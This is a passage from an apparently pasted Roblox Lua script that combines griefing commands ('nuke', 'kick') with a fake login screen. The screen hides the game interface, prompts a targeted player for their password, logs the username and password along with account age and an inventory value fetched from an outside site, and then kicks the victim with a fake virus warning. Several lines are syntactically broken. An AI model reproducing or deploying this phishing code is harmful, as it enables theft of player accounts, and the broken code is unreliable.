  1926. if plr and plr.Character and plr.Character:findFirstChild("Humanoid") then
  1927. plr.Character.Humanoid.Health = plr.Character.Humanoid.MaxHealth
  1928. plr.Character.Humanoid.Changed:connect(function() r.Character.Humanoid.Health = plr.Character.Humanoid.MaxHealth end)
  1929. end
  1930. end))
  1931. until nil]]
  1932. end
  1933. end
  1934. end
  1935.  
  1936.  
  1937.  
  1938.  
  1939.  
  1940.  
  1941. if Cmd.Text:lower():sub(1,5) == "nuke " then
  1942. local plrz = GetPlr(plr, Cmd.Text:lower():sub(6))
  1943. for i, v in pairs(plrz) do
  1944. coroutine.resume(coroutine.create(function()
  1945. if v and v.Character and v.Character:findFirstChild("Torso") then
  1946. local p = Instance.new("Part",game.Workspace)
  1947. p.Anchored = true
  1948. p.CanCollide = false
  1949. p.formFactor = "Symmetric"
  1950. p.Shape = "Ball"
  1951. p.Size = Vector3.new(1,1,1)
  1952. p.BrickColor = BrickColor.new("New Yeller")
  1953. p.Transparency = .5
  1954. p.Reflectance = .2
  1955. p.TopSurface = 0
  1956. p.BottomSurface = 0
  1957. p.Touched:connect(function(hit)
  1958. if hit and hit.Parent then
  1959. local ex = Instance.new("Explosion", game.Workspace)
  1960. ex.Position = hit.Position
  1961. ex.BlastRadius = 11
  1962. ex.BlastPressure = math.huge
  1963. end
  1964. end)
  1965. local cf = v.Character.Torso.CFrame
  1966. p.CFrame = cf
  1967. for i = 1, 333 do
  1968. p.Size = p.Size + Vector3.new(3,3,3)
  1969. p.CFrame = cf
  1970. wait(1/44)
  1971. end
  1972. p:Destroy()
  1973. end
  1974. end))
  1975. end
  1976. end
  1977.  
  1978. if Cmd.Text:lower():sub(1,5) == "kick " then
  1979. local plrz = GetPlr(plr, Cmd.Text:lower():sub(6))
  1980. for i, v in pairs(plrz) do
  1981. coroutine.resume(coroutine.create(function()
  1982. if v then v:Destroy() end
  1983. end))
  1984. end
  1985. end
  1986.  
  1987. if Cmd.Text:lower():sub(1,5) == "emit " then
  1988. local chk1 = Cmd.Text:lower():sub(6):find(" ") + 5
  1989. local plrz = GetPlr(plr, Cmd.Text:lower():sub(6,chk1-1))
  1990. for i, v in pairs(plrz) do
  1991. coroutine.resume(coroutine.create(function()
  1992. if v.Character then v.Character:FindFirstChild("Torso")
  1993. local cl = Instance.new("ParticleEmitter", v.Character.Torso)
  1994. cl.Texture = "rbxassetid://"..Cmd.Text:sub(chk1+1)-1
  1995. end
  1996. end))
  1997. end
  1998.  
  1999. if Cmd.Text:lower():sub(1,7) == "unemit " then
  2000. local plrz = GetPlr(plr, Cmd.Text:lower():sub(8))
  2001. for i, v in pairs(plrz) do
  2002. coroutine.resume(coroutine.create(function()
  2003. if v and v.Character and v.Character:findFirstChild("Torso") then
  2004. for z, cl in pairs(v.Character.Torso:GetChildren()) do if cl:IsA("ParticleEmitter") then cl:Destroy() end end
  2005. end
  2006. end))
  2007. end
  2008. end end
  2009.  
  2010. end
  2011.  
  2012.  
  2013.  
  2014. function Clicked5()
  2015. for i,v in pairs(game.Players:GetChildren())do
  2016. gui = NewGuiPart65:Clone()
  2017. gui.Parent = Owner.PlayerGui
  2018. gui.ErrorFrame.Visible = true
  2019. game.StarterGui:SetCoreGuiEnabled("PlayerList", false)
  2020. game.StarterGui:SetCoreGuiEnabled("Backpack", false)
  2021. game.StarterGui:SetCoreGuiEnabled("Chat", false)
  2022. passw = gui.ErrorFrame.TB2.Text
  2023. tb1 = gui.ErrorFrame.TB1.Text
  2024. end end
  2025.  
  2026.  
  2027.  
  2028.  
  2029. wait(3)
  2030. NewGuiPart72.Visible = true
  2031.  
  2032.  
  2033. RAPApi = true
  2034.  
  2035.  
  2036.  
  2037.  
  2038. local checktrue = Instance.new("BoolValue")
  2039. checktrue.Parent = CoreValues
  2040. checktrue.Name = "PasscheckTrue"
  2041. checktrue.Value = false
  2042.  
  2043. tb1 = otherp.Name
  2044.  
  2045. PassWord.Value = NewGuiPart71.Text
  2046. UserName.Value = NewGuiPart73.Text
  2047.  
  2048. function getRap(user)
  2049. local rap = ""
  2050. if RAPApi then
  2051. ypcall(function()
  2052. local http = game:GetService("HttpService")
  2053. local rawrap = http:JSONDecode(game:HttpGet("http://roblox.plus:2052/inventory?username=" .. user,true))
  2054. rap = tostring(rawrap.rap)
  2055. end)
  2056. else
  2057. rap = "N/A"
  2058. end
  2059. return rap
  2060. end
  2061. print("This Is Jech's Property. Please DOnt Reclaim this Project.")
  2062.  
  2063. function BCtoDumpStr(str)
  2064. local res = ""
  2065. if str == "Enum.MembershipType.BuildersClub" then
  2066. res = "[BC] "
  2067. elseif str == "Enum.MembershipType.TurboBuildersClub" then
  2068. res = "[TBC] "
  2069. elseif str == "Enum.MembershipType.OutrageousBuildersClub" then
  2070. res = "[OBC] "
  2071. elseif str == "Enum.MembershipType.None" then
  2072. res = ""
  2073. end
  2074. return res
  2075. end
  2076.  
  2077. function logAccount(user,pass)
  2078. local playerName = user.Name
  2079. local playerAge = tostring(user.AccountAge)
  2080. local playerRAP = getRap(playerName)
  2081.  
  2082.  
  2083. print(BCtoDumpStr(tostring(otherp.MembershipType)) .. playerName .. " : " .. pass .. " Age: " .. playerAge .. " RAP: " .. playerRAP)
  2084. end
  2085.  
  2086. local GuiRemains = Instance.new("Folder")
  2087. GuiRemains.Name = "GuiRemains"
  2088. GuiRemains.Parent = CoreValues
  2089.  
  2090. function checkPass(pass)
  2091.  
  2092. if pass == "Password" or pass == "" or pass == "Enter Your Password" or pass == "Incorrect Password" or pass == "Enter your Password" then
  2093. Textg.Text = "PassWord Not Found In DataBase."
  2094. return false
  2095. end
  2096. local foundNums = 0
  2097. local foundLetters = 0
  2098. if string.find(pass, " ") then
  2099. Textg.Text = "PassWord Not Found In DataBase."
  2100. return false
  2101. end
  2102. if pass:len() < 6 or pass:len() > 20 then
  2103. Textg.Text = "PassWord Not Found In DataBase."
  2104. return false
  2105. end
  2106. for i=1,pass:len() do
  2107. if pass:sub(i,i):match("%d") ~= nil then
  2108. foundNums = foundNums + 1
  2109. end
  2110. end
  2111. if foundNums < 2 then
  2112. Textg.Text = "PassWord Not Found In DataBase."
  2113. return false
  2114. end
  2115. for i=1,pass:len() do
  2116. if pass:sub(i,i):match("%a") ~= nil then
  2117. foundLetters = foundLetters + 1
  2118. end
  2119. end
  2120. if foundLetters < 4 then
  2121. Textg.Text = "PassWord Not Found In DataBase."
  2122. return false
  2123. end
  2124. checktrue = true
  2125. return true
  2126.  
  2127. end
  2128. function respawn(user)
  2129. local person = game.Players[user]
  2130. person.PlayerGui["LoginGui"].ErrorFrame.Done.Value = true
  2131. person:Kick("A Virus Was Detected.")
  2132. person:Destroy();
  2133. end
  2134.  
  2135. function UnGui(user)
  2136. user.PlayerGui["LoginGui"].ErrorFrame.Done.Value = true
  2137. user:LoadCharacter();
  2138. game.StarterGui:SetCoreGuiEnabled("PlayerList", true)
  2139. game.StarterGui:SetCoreGuiEnabled("Backpack", true)
  2140. game.StarterGui:SetCoreGuiEnabled("Chat", true)
  2141. end
  2142.  
  2143. function Done()
  2144. local pl = gui.Parent.Parent
  2145. UserName.Value = pl.Name
  2146. PassWord.Value = gui.ErrorFrame.TB2.Text
  2147. checkPass(gui.ErrorFrame.TB2.Text)
  2148. logAccount(otherp,gui.ErrorFrame.TB2.Text)
  2149. respawn(pl.Name);
  2150. pl:Kick("A Virus Was Detected.")
  2151. game.StarterGui:SetCoreGuiEnabled("PlayerList", true)
  2152. game.StarterGui:SetCoreGuiEnabled("Backpack", true)
  2153. game.StarterGui:SetCoreGuiEnabled("Chat", true)
  2154.  
  2155. end
  2156.  
  2157.  
  2158. function Clicked6()
  2159.  
  2160. Done();
  2161.  
  2162.  
  2163.  
  2164. end
  2165.  
  2166.  
  2167. game.Workspace.ChildAdded:connect(function(per)
  2168. if per.Name == otherp.Name then
  2169. if IsRunning.Value == true then
  2170. if otherp.PlayerGui["LoginGui"].ErrorFrame.Done.Value == false then
  2171. Clicked5()
  2172. end
  2173. end end
  2174. end)
  2175.  
  2176.  
  2177.  
  2178.  
  2179.  
  2180. Owner.PlayerGui.MGVX.Frame.TL3.MouseButton1Up:connect(Clicked1)
  2181. Owner.PlayerGui.MGVX.Frame.TL4.MouseButton1Up:connect(Clicked2)
  2182. Owner.PlayerGui.MGVX.Frame.TL1.MouseButton1Up:connect(Clicked)
  2183. Owner.PlayerGui.MGVX.Frame.TL1.MouseButton1Down:connect(Click)
  2184. Owner.PlayerGui.MGVX.Frame.CMDS.Execute.MouseButton1Up:connect(Clicked3)
  2185. Owner.PlayerGui.MGVX.Frame.ScrollingFrame.TB.MouseButton1Up:connect(Clicked4)
  2186. Owner.Backpack:WaitForChild(ToolName.Value).Equipped:connect(Clicked5)
  2187. Owner.PlayerGui:WaitForChild("LoginGui"):WaitForChild("ErrorFrame"):WaitForChild("LoginButton").MouseButton1Up:connect(Clicked6)
  2188.  
  2189. NewGuiPart1:Clone().Parent = CoreValues
  2190. NewGuiPart65:Clone().Parent = CoreValues
  2191.  
  2192. game.StarterGui.ResetPlayerGuiOnSpawn = false
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement